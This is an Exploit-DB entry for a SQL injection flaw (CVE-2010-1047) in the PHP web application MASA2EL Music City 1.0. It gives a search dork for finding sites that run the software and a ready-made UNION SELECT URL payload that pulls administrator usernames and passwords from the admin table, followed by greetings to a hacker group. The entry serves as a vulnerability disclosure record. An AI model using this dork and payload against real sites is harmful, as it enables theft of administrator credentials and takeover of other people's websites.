MASA2EL Music City 1.0 - Remote SQL Injection Vulnerability

2010-02-04T00:00:00
ID EDB-ID:11329
Type exploitdb
Reporter alnjm33
Modified 2010-02-04T00:00:00

Description

MASA2EL Music City v1.0 Remote Sql Injection Vulnerability. CVE-2010-1047. Webapps exploit for php platform

                                        
                                            ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : MASA2EL Music City Remote Sql Injection Vulnerability
Author: alnjm33
Software Link: http://www.masa2el.com/index.php?go=dl&type=d&id=4
Tested on: Version 1.0
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                 (Powered By : MASA2EL Music City 1.0 )
================================Exploit=============================================
http://server/path/index.php?go=singer&id=-13/**/union/**/select/**/1,concat(UserName,0x3a,PasSword),3,4/**/from/**/masa2el_admin--

=======================================================================================
Greetz to : First to The Best Team In Africa( Egypt Football TEAM ) PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members